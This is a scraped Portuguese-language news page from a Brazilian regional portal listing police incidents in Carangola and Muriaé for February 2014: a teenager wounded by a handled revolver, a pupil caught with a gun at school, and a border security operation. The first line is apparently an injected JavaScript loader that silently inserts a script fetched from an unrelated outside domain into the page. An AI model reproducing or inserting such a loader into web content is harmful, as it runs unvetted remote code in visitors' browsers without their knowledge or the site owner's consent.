;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola e Região - 26/02/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola e Região – 26/02/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 26/02/2014

                        75ª CIA PM- CARANGOLA-MG

NADA A REGISTRAR.

                         76ª CIA PM – MURIAÉ

 AUTOLESÃO PROVENIENTE DE DISPARO DE ARMA DE FOGO EM MURIAÉ-MG.           

            Em 25/02/2014, por volta das 13h04min, policiais militares compareceram ao Hospital São Paulo, e em contato com o adolescente K.H.M.M., de 15 anos, este relatou que estava no interior de uma barbearia localizada à RUA JOÃO DORNELAS,     BAIRRO DORNELAS, quando foi procurado pelo autor, o qual sabe apenas o primeiro nome, que passou a lhe mostrar um revolver calibre .22 marca rossi, que lhe pertencia, no momento em que a vitima passou a manusear a referida arma, o revolver veio a disparar acertando-o no lado esquerdo da barriga, causando uma autolesão. Foi dado inicio a um rastreamento, momento em que receberam uma informação via 190 que o proprietário da arma havia deixado o referido armamento próximo o posto policial do bairro Dornelas, sendo localizado a referida arma abandonada com dois cartuchos intactos debaixo de uma moita de grama. O proprietário da arma de fogo evadiu-se tomado rumo ignorado e o armamento foi entregue na Delegacia de Polícia para demais providências.

PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ-MG.

            Em 25/02/2014, por volta das 11h50min, policiais militares compareceram em uma escola localizada à Rua Valdomiro Inácio Rodrigues, bairro Aeroporto, onde em contato com a funcionária da escola, esta narrou que um dos alunos do colégio lhe disse que seu colega de sala conhecido como A.M.F., de 14 anos, estaria guardando dentro da pochete uma arma de fogo e ao saber de tal noticia, tendo a funcionária deslocado até a sala de aula do alno, e pediu ao citado aluno para olhar dentro da pochete, onde encontrou uma garrucha sem munição, sendo que recolheu a arma e encaminhou o menor para a sala da diretoria e comunicou aos pais do adolescente. A.M.F., de 14 anos informou que um indivíduo não identificado lhe abordou no trajeto de casa para a escola e lhe disse para pegar tal arma se não iria apanhar, e com receio pegou a arma e guardou na pochete. A arma foi recolhida e dado voz de apreensão ao adolescente que foi encaminhado a Delegacia de Polícia para demais medidas de praxe.

 

 

47º BPM REALIZA OPERAÇÃO DIVISA SEGURA

 

 

Foi desencadeado em toda área do 47º BPM, na data de 25/02/14, Operação Divisa Segura, realizada nas áreas de divisa dos Estados de Minas Gerais com Rio de Janeiro, compreendendo as cidades de Tombos, Antônio Prado de Minas, Eugenópolis, Palma, sendo empenhados 12 policiais militares  e 05 viaturas, 03 policiais rodoviários federais e 01 viatura, 06 detetives e 04 viaturas, resultando na abordagem de 73 veículos, 91 pessoas, e na prisão de um indivíduo e 01 pedra de crack. 

O objetivo da Operação é reforçar a sensação de segurança a toda população ordeira, em toda área de atuação do 47º BPM, e em especial a região de fronteira.

  ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

 

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.